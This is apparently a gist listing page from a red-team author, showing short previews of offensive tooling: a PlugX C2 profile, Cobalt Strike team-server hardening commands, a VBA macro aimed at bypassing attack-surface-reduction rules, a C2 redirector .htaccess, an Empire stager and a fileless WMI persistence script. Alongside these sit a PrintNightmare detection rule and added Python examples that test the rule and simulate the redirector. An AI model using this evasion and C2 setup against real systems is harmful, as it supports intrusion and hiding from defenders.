View plugx.profile
#
# PlugX Profile
# Author: @infosecn1nja
#
# https://github.com/silence-is-best/c2db/blob/master/README.md
set sleeptime "30000"; # use a ~30s delay between callbacks
set jitter "10"; # throw in a 10% jitter
stage {
View printernightmare_cve_2021_34527.xml
<!--
- PrinterNightmare CVE-2021-34527 Exploit Detection
- Created by Rahmat Nurfauzi (@infosecn1nja).
- This program is a free software; you can redistribute it and/or modify it under the terms of GPLv2.
-->
<group name="sysmon,">
<rule id="99948" level="15">
<if_group>sysmon_event_11</if_group>
<field name="win.eventdata.Image">\\\\spoolsv.exe$</field>
<field name="win.eventdata.TargetFilename">\\\\New\\\\unidrv.dll$</field>
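The rule above fires on Sysmon FileCreate (event 11) records where spoolsv.exe writes a file ending in \New\unidrv.dll. The following Python, an added example that is not part of the gist, runs the same two conditions over constructed Sysmon records in the JSON layout the Wazuh Windows agent emits (win.system.eventID, win.eventdata.Image, win.eventdata.TargetFilename); the sample lines, the case-insensitive matching and the alert dictionary shape are choices made here, not taken from the rule.

```python
import json
import re

# Python equivalents of the two <field> regexes in Wazuh rule 99948:
# the creating process must be spoolsv.exe and the created file must be
# unidrv.dll inside a directory named "New". Windows paths are
# case-insensitive, so this example matches case-insensitively (a choice
# made here, not stated by the rule).
IMAGE_RE = re.compile(r"\\spoolsv\.exe$", re.IGNORECASE)
TARGET_RE = re.compile(r"\\New\\unidrv\.dll$", re.IGNORECASE)

RULE_ID = 99948
RULE_LEVEL = 15


def _event(event_id, image, target):
    """Build one constructed Sysmon record in the JSON layout the Wazuh
    Windows agent uses (win.system.eventID, win.eventdata.*)."""
    return json.dumps({
        "win": {
            "system": {"eventID": str(event_id),
                       "channel": "Microsoft-Windows-Sysmon/Operational"},
            "eventdata": {"Image": image, "TargetFilename": target},
        }
    })


# Constructed sample log lines, not real telemetry.
SAMPLE_LINES = [
    # 1: spoolsv.exe writes unidrv.dll under ...\3\New\ -> should alert
    _event(11, r"C:\Windows\System32\spoolsv.exe",
           r"C:\Windows\System32\spool\drivers\x64\3\New\unidrv.dll"),
    # 2: same process, normal driver store path (no \New\) -> benign
    _event(11, r"C:\Windows\System32\spoolsv.exe",
           r"C:\Windows\System32\spool\drivers\x64\3\unidrv.dll"),
    # 3: right paths but Sysmon event 1 (ProcessCreate), not 11 (FileCreate)
    _event(1, r"C:\Windows\System32\spoolsv.exe",
           r"C:\Windows\System32\spool\drivers\x64\3\New\unidrv.dll"),
    # 4: a non-spooler process dropping the same filename -> outside this rule
    _event(11, r"C:\Users\alice\AppData\Local\Temp\tool.exe",
           r"C:\Users\alice\AppData\Local\Temp\New\unidrv.dll"),
]


def matches_rule(event):
    """True when a decoded event satisfies every condition of rule 99948:
    sysmon_event_11 (FileCreate) plus both field regexes."""
    win = event.get("win", {})
    if win.get("system", {}).get("eventID") != "11":
        return False
    data = win.get("eventdata", {})
    return bool(IMAGE_RE.search(data.get("Image", ""))
                and TARGET_RE.search(data.get("TargetFilename", "")))


def scan(lines):
    """Run the rule over raw JSON lines and return the alerts it would raise.
    Malformed lines are skipped instead of aborting the whole scan."""
    alerts = []
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        if matches_rule(event):
            data = event["win"]["eventdata"]
            alerts.append({"rule_id": RULE_ID, "level": RULE_LEVEL,
                           "image": data["Image"],
                           "target": data["TargetFilename"]})
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LINES):
        print(alert)
```

Only the first sample line produces an alert: the second misses the \New\ directory, the third is the wrong event ID, and the fourth is written by a process other than spoolsv.exe. Anchoring both regexes with `$` is what keeps a file such as unidrv.dll.bak or a sibling directory from matching.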
View gen-chm.py
#!/usr/bin/python
import argparse
import re, random
import string, os, os.path

def rand_num(min, max):
    # random integer in [min, max)
    return random.randrange(min, max)

def gen_str(size):
    # random ASCII-letter string of the given length, drawn from the OS CSPRNG
    return "".join(random.SystemRandom().choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(size))
View gist:97b4b2e5132ae9d3d18448b3f7f7aa93
Make a rule that allows port 80/443 access only from the redirector (rules are evaluated in order, so the ACCEPT for the redirector must come before the catch-all DROP):
iptables -A INPUT -p tcp -s <REDIRECTOR_IP> --dport 443 -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -j DROP
iptables -A INPUT -p tcp -s <REDIRECTOR_IP> --dport 80 -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP
Change the default team server port (50050):
sed -i 's/50050/<PORT>/g' /path/cobaltstrike/teamserver
View gist:04ab2d8ea15f98880bbf7b70168fa3dd
APT Group/Red Team Weaponization Phase
=======================================
C2 tools :
- Cobalt Strike
- Empire
- PoshC2
- PupyRAT
- Metasploit
View ASR Rules Bypass.vba
' ASR rules bypass creating child processes
' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction
' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule
Sub ASR_blocked()
    Dim WSHShell As Object
    Set WSHShell = CreateObject("Wscript.Shell")
    WSHShell.Run "cmd.exe"
End Sub
View Inject.cs
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;
public class TestClass
{
    public TestClass()
    {}
View .htaccess
RewriteEngine On
# Uncomment the below line for verbose logging, including seeing which rule matched.
#LogLevel alert rewrite:trace5
# BURN AV BURN
# AWS Exclusions. Cloudfronted requests by default will have a UA of "Amazon Cloudfront". More info here: https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/header-caching.html#header-caching-web-device
RewriteCond expr "-R '54.0.0.0/8'" [OR]
RewriteCond expr "-R '52.0.0.0/8'" [OR]
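The `-R '<cidr>'` expression tests whether REMOTE_ADDR falls inside the given network, and the comment says CloudFront-fronted requests arrive with a User-Agent of "Amazon CloudFront". The Python below is an added example, not part of the .htaccess, that applies those same checks to a request and reports where a redirector would send it; the two networks are the ones in the preview, the User-Agent test is taken from the comment, and the decoy and C2 backend URLs, the sample requests and the routing tuple are assumptions made for this example (the full .htaccess is cut off after these two conditions).

```python
import ipaddress

# The two networks from the RewriteCond lines above. Whatever the full
# .htaccess checks after them is cut off in the preview.
EXCLUDED_NETWORKS = [ipaddress.ip_network(n) for n in ("54.0.0.0/8", "52.0.0.0/8")]
# User-Agent marker from the comment in the .htaccess.
EXCLUDED_UA_MARKERS = ("Amazon CloudFront",)

# Assumed destinations (hypothetical values): where filtered traffic is sent
# and where a real beacon request is proxied.
DECOY_URL = "https://www.example.org/"
C2_BACKEND = "https://127.0.0.1:8443"


def exclusion_reason(remote_addr, user_agent):
    """Return why a request would be filtered, or None if it may pass.
    Mirrors RewriteCond expr "-R '<cidr>'" (REMOTE_ADDR inside the CIDR)
    plus the User-Agent check. An unparsable address fails closed: it is
    treated as excluded rather than forwarded to the C2."""
    try:
        ip = ipaddress.ip_address(remote_addr)
    except ValueError:
        return "unparsable remote address"
    for net in EXCLUDED_NETWORKS:
        if ip in net:  # an IPv6 address in an IPv4 network is simply False
            return f"source {ip} in excluded network {net}"
    for marker in EXCLUDED_UA_MARKERS:
        if marker in user_agent:
            return f"user agent contains {marker!r}"
    return None


def route(remote_addr, user_agent):
    """Decide where the redirector sends the request:
    ("decoy", url, reason) for filtered traffic, ("c2", url, reason) otherwise."""
    reason = exclusion_reason(remote_addr, user_agent)
    if reason is not None:
        return ("decoy", DECOY_URL, reason)
    return ("c2", C2_BACKEND, "no exclusion matched")


# Constructed sample requests (address, User-Agent), not captured traffic.
SAMPLE_REQUESTS = [
    ("54.240.1.1", "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"),  # AWS range
    ("198.51.100.7", "Amazon CloudFront"),                         # CDN UA
    ("198.51.100.7", "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"),  # passes
    ("not-an-ip", "Mozilla/5.0"),                                  # fails closed
    ("2001:db8::1", "Mozilla/5.0"),                                # v6, passes
]

if __name__ == "__main__":
    for addr, ua in SAMPLE_REQUESTS:
        print(addr, "->", route(addr, ua))
```

Two caveats carry over to the real .htaccess: `-R` looks at REMOTE_ADDR, so if the redirector itself sits behind a CDN or load balancer every request appears to come from that proxy and the client address lives in a header that must not be trusted blindly; and /8 blocks are a coarse approximation of AWS address space, for which AWS publishes an authoritative ip-ranges.json.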
View wmic_starfighters.py
from lib.common import helpers

class Stager:
    def __init__(self, mainMenu, params=[]):
        self.info = {
            'Name': 'wmic_xsl_starfighters',
            'Author': ['@subTee','@mattifestation','@infosecn1nja','@Cneelis'],
View WMI-Persistence.ps1
# Fileless WMI Persistence (PSEDWMIEvent_SU - SystemUptime)
# https://wikileaks.org/ciav7p1/cms/page_14587908.html
<#
.SYNOPSIS
This script creates a persisted WMI event that executes a command upon trigger of the system's uptime being between a given range in seconds. The event will trigger only once.
#>
$EventFilterName = "Fileless WMI Persistence SystemUptime"